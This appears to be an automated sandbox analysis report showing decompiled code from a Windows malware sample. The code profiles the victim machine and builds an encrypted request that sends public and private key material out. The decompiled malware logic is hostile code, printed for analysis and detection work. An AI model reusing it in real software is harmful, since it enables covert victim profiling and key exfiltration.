					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x00d769a4
0x00d769a7
0x00d769b8
0x00d769c1
0x00d769c9
0x00d769d2
0x00d769da
0x00d769da
0x00d769df
0x00d769e5
0x00d769ed
0x00d769f3
0x00d769fb
0x00d769fb
0x00d76a01
0x00d76a07
0x00d76a0f
0x00d76a15
0x00d76a1d
0x00d76a1d
0x00d76a23
0x00d76a29
0x00d76a31
0x00d76a37
0x00d76a3f
0x00d76a3f
0x00d76a45
0x00d76a4b
0x00d76a53
0x00d76a59
0x00d76a61
0x00d76a61
0x00d76a67
0x00d76a6d
0x00d76a75
0x00d76a7b
0x00d76a83
0x00d76a83
0x00d76a89
0x00d76a8f
0x00d76a97
0x00d76a9d
0x00d76aa5
0x00d76aa5
0x00d76aab
0x00d76ab1
0x00d76ab9
0x00d76abf
0x00d76ac7
0x00d76ac7
0x00d76acd
0x00d76ad3
0x00d76adb
0x00d76ae1
0x00d76ae9
0x00d76ae9
0x00d76aef
0x00d76afc
0x00d76b02
0x00d76b05
0x00d76b0a
0x00d76b27
0x00d76b0c
0x00d76b16
0x00d76b1c
0x00d76b34
0x00d76b3c
0x00d76b42
0x00d76b4a
0x00d76b56
0x00d76b56
0x00d76b60
0x00d76b66
0x00d76b6e
0x00d76b74
0x00d76b7c
0x00d76b7c
0x00d76b88
0x00d76b92

APIs

lstrcatW.KERNEL32(?,?), ref: 00D769C1
lstrcatW.KERNEL32(?,00D803F0), ref: 00D769C9
lstrcatW.KERNEL32(?,?), ref: 00D769D2
lstrcatW.KERNEL32(?,00D803F4), ref: 00D769DA
lstrcatW.KERNEL32(?,?), ref: 00D769E5
lstrcatW.KERNEL32(?,00D803F0), ref: 00D769ED
lstrcatW.KERNEL32(?,?), ref: 00D769F3
lstrcatW.KERNEL32(?,00D803F4), ref: 00D769FB
lstrcatW.KERNEL32(?,?), ref: 00D76A07
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76A0F
lstrcatW.KERNEL32(?,?), ref: 00D76A15
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76A1D
lstrcatW.KERNEL32(?,?), ref: 00D76A29
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76A31
lstrcatW.KERNEL32(?,?), ref: 00D76A37
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76A3F
lstrcatW.KERNEL32(?,?), ref: 00D76A4B
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76A53
lstrcatW.KERNEL32(?,?), ref: 00D76A59
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76A61
lstrcatW.KERNEL32(?,?), ref: 00D76A6D
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76A75
lstrcatW.KERNEL32(?,00D748B6), ref: 00D76A7B
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76A83
lstrcatW.KERNEL32(?,?), ref: 00D76A8F
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76A97
lstrcatW.KERNEL32(?,?), ref: 00D76A9D
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76AA5
lstrcatW.KERNEL32(?,?), ref: 00D76AB1
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76AB9
lstrcatW.KERNEL32(?,?), ref: 00D76ABF
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76AC7
lstrcatW.KERNEL32(?,?), ref: 00D76AD3
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76ADB
lstrcatW.KERNEL32(?,?), ref: 00D76AE1
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76AE9
VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,00D745E9,00000000,?,00003000,00000040,00000000,?,00000000), ref: 00D76AFC
wsprintfW.USER32 ref: 00D76B16
wsprintfW.USER32 ref: 00D76B27
lstrcatW.KERNEL32(?,?), ref: 00D76B34
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76B3C
lstrcatW.KERNEL32(?,?), ref: 00D76B42
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76B4A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 00D76B56
lstrcatW.KERNEL32(?,?), ref: 00D76B66
lstrcatW.KERNEL32(?,00D803F0), ref: 00D76B6E
lstrcatW.KERNEL32(?,?), ref: 00D76B74
lstrcatW.KERNEL32(?,00D803F4), ref: 00D76B7C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,00D745E9,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D76B7F

Strings

%x%x, xrefs: 00D76B10
undefined, xrefs: 00D76B21

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 5fb394be8be2fe19a0be661b49d6ccba50b9a599af27f983bf3a695137b6cd75
Instruction ID: a9eb2c5b57d1f25f4d590b46ef7fc64b30ae049112849d2238545988440a856a
Opcode Fuzzy Hash: 5fb394be8be2fe19a0be661b49d6ccba50b9a599af27f983bf3a695137b6cd75
Instruction Fuzzy Hash: 5C516F31182A69BBCB673F658C49F9F3E28EFCA700F054050F90424095DB79865ADFBA

Uniqueness

Uniqueness Score: -1.00%

Function 00D74550 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83
stringmemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D739B0: GetProcessHeap.KERNEL32(?,?,00D74587,00000000,?,00000000), ref: 00D73A4C

Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00D76DB7
Part of subcall function 00D76D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00D76DC8
Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00D76DE6
Part of subcall function 00D76D90: GetComputerNameW.KERNEL32 ref: 00D76DF0
Part of subcall function 00D76D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00D76E10
Part of subcall function 00D76D90: wsprintfW.USER32 ref: 00D76E51
Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00D76E6E
Part of subcall function 00D76D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00D76E92
Part of subcall function 00D76D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00D76EB6
Part of subcall function 00D76D90: RegCloseKey.ADVAPI32(00000000), ref: 00D76ED2

Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76BF2
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76BFD
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C13
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C1E
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(00D748B6,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C34
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C3F
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C55
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C60
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C76
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C81
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C97
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CA2
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CC1
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CCC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D745AC
lstrcpyW.KERNEL32 ref: 00D745CF
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D745D6
CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D745EE
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D745FA
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D74601
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D7461B

Strings

Global\, xrefs: 00D745C9

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 452d645f0a22d7c2c6c099fec1db1b491ede395cb3b6ec5be3d2c5da7ff410e9
Instruction ID: 548ecaeedd3de3f5b9e6c2db87b3220ece50d01904a48e28df3b424d4b679383
Opcode Fuzzy Hash: 452d645f0a22d7c2c6c099fec1db1b491ede395cb3b6ec5be3d2c5da7ff410e9
Instruction Fuzzy Hash: 7421D5726603157BE225A724DC5BF6FB76CDB41B50F500628F60DA61D0FB90AD04C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 00D77720 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D77720(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x00d77721
0x00d7772d
0x00d77739
0x00d77739
0x00d7773f
0x00d7774b
0x00d7774b
0x00d77751
0x00d7775d
0x00d7775d
0x00d77763
0x00d7776f
0x00d7776f
0x00d77775
0x00d77781
0x00d77781
0x00d77787
0x00d77793
0x00d77793
0x00d77799
0x00d777a5
0x00d777a5
0x00d777ab
0x00d777b7
0x00d777b7
0x00d777bd
0x00d777c9
0x00d777c9
0x00d777d2
0x00000000
0x00d777e1
0x00d777e5

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D77739
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D7774B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D7775D
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D7776F
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D77781
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D77793
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D777A5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D777B7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D777C9
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,00D7462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D777E1

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: d0a411f9e09b89539ca99c08a061e1b2ee8e67fbfd60203ad26e8c70ad9986c3
Instruction ID: d6078a76b9e33b53fa7a6516943f909d26c2a25910dc3ffa85544c960f7c157e
Opcode Fuzzy Hash: d0a411f9e09b89539ca99c08a061e1b2ee8e67fbfd60203ad26e8c70ad9986c3
Instruction Fuzzy Hash: 6A21EF30244B04AAE7761A15DC4AF65B2E1BB40B05F298D38F2C5284F0DBF57899DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00D76D10 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00D76D10(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x00d76d26
0x00d76d30
0x00d76d84
0x00d76d32
0x00d76d35
0x00d76d47
0x00d76d4f
0x00d76d66
0x00d76d6f
0x00d76d7b
0x00d76d51
0x00d76d54
0x00d76d57
0x00d76d63
0x00d76d63
0x00d76d4f

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,00D7726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00D76D26
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,00D7726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00D76D47
RegCloseKey.KERNELBASE(?,?,00D7726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00D76D57
GetLastError.KERNEL32(?,00D7726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00D76D66
RegCloseKey.ADVAPI32(?,?,00D7726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00D76D6F

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 835d28917f093520ab139faea3303626ef5bf0992ff13c93b044481395a1bfb2
Instruction ID: 13789bab518c43abcafc1abd2cdaf05104692b36e8e1ad472c76bd48b67b4c09
Opcode Fuzzy Hash: 835d28917f093520ab139faea3303626ef5bf0992ff13c93b044481395a1bfb2
Instruction Fuzzy Hash: 6701217361021CBBCB209F94ED05DDABB7CEB08351F004166FD09D6220E7319A20EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00D74AF0 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t2;

				E00D748A0(_t2); // executed
				ExitProcess(0);
			}

0x00d74af3
0x00d74afa

APIs

Part of subcall function 00D748A0: Sleep.KERNELBASE(000003E8), ref: 00D748AB
Part of subcall function 00D748A0: ExitProcess.KERNEL32 ref: 00D748BC

ExitProcess.KERNEL32 ref: 00D74AFA

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: ExitProcess$Sleep
String ID:
API String ID: 1320946285-0
Opcode ID: 63712504ee38f6735a9fe27a3c5d6b989bdd45a5c546662a148664b0d74c8ffd
Instruction ID: ba76d23b3acc1a638a426644ba65cc5a81b3329c35f0c0cb528d6757f14a687c
Opcode Fuzzy Hash: 63712504ee38f6735a9fe27a3c5d6b989bdd45a5c546662a148664b0d74c8ffd
Instruction Fuzzy Hash: EEA0023164974DDFD1813BB5AC5FB4AB65C9B01B02FC04060BA1DD56927ED4749085BB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D75750 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00D75750(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t170;
				signed int _t172;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				int _t210;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_t210 = __edx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E00D739B0( &_v404);
				E00D76D90( &_v492);
				_t255 = E00D76BA0( &_v492);
				_t7 = _a8 + _t210 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + (_a8 + _t210) * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E00D769A0( &_v440, _t259);
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.1");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0xd80128]");
					_v448 = _t233;
					_t234 =  *0xd80134; // 0x6a73
					_v444 = _t234;
					_t235 =  *0xd80136; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E00D78B30( &_v295, 0, 0xff);
					E00D75C40( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E00D75CF0( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E00D75370(_t283,  &_v508, 1);
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E00D77720( &_v408);
				return _t268;
